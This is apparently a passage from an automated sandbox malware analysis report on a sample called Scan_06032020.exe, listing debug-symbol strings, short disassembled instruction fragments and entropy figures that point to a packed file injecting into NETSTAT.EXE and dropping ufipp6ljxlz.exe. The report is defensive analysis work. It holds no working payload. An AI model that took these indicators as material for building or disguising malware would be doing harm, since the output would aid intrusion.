          Source: Binary string: NvidiaCache.pdbh/~/ p/_CorDllMainmscoree.dll source: Scan_06032020.exe
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.572974242.00000000060D0000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Scan_06032020.exe, 00000004.00000002.603915424.0000000000FF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Scan_06032020.exe, 00000004.00000002.605673686.0000000001B0F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1161211025.00000000034EF000.00000040.00000001.sdmp, ufipp6ljxlz.exe, 00000011.00000002.893588814.0000000001310000.00000040.00000001.sdmp, wlanext.exe, 00000012.00000002.897934309.0000000002C80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Scan_06032020.exe, 00000004.00000002.605673686.0000000001B0F000.00000040.00000001.sdmp, NETSTAT.EXE, ufipp6ljxlz.exe, 00000011.00000002.893588814.0000000001310000.00000040.00000001.sdmp, wlanext.exe, 00000012.00000002.897934309.0000000002C80000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdb source: ufipp6ljxlz.exe, 00000011.00000002.893303514.0000000000EE9000.00000004.00000020.sdmp
          Source: Binary string: NvidiaCache.pdb source: ufipp6ljxlz.exe, Scan_06032020.exe
          Source: Binary string: wlanext.pdbGCTL source: ufipp6ljxlz.exe, 00000011.00000002.893303514.0000000000EE9000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.572974242.00000000060D0000.00000002.00000001.sdmp

          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C834A pushad ; retf
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 0_2_0B1C9272 push FFFFFF8Bh; iretd
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00417040 push 79BA216Bh; ret
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_004169D4 push edx; iretd
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_0041DBBD push ss; ret
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00416607 push ebx; ret
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00416634 push edi; ret
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_0041C6F2 push eax; ret
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_0041C6FB push eax; ret
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_0041C6A5 push eax; ret
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_0041C75C push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0344DE2D push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E7DBBD push ss; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E77040 push 79BA216Bh; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E7C6F2 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E7C6FB push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E7C6A5 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E7C75C push eax; ret
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 16_2_0B449277 push FFFFFF8Bh; iretd
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00417040 push 79BA216Bh; ret
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_004169D4 push edx; iretd
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_0041DBBD push ss; ret
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00416607 push ebx; ret
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_00416634 push edi; ret
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_0041C6F2 push eax; ret
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_0041C6FB push eax; ret
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_0041C6A5 push eax; ret
          Source: C:\Program Files (x86)\Qor0xv4i\ufipp6ljxlz.exeCode function: 17_2_0041C75C push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.50780314638
          Source: initial sampleStatic PE information: section name: .text entropy: 7.50780314638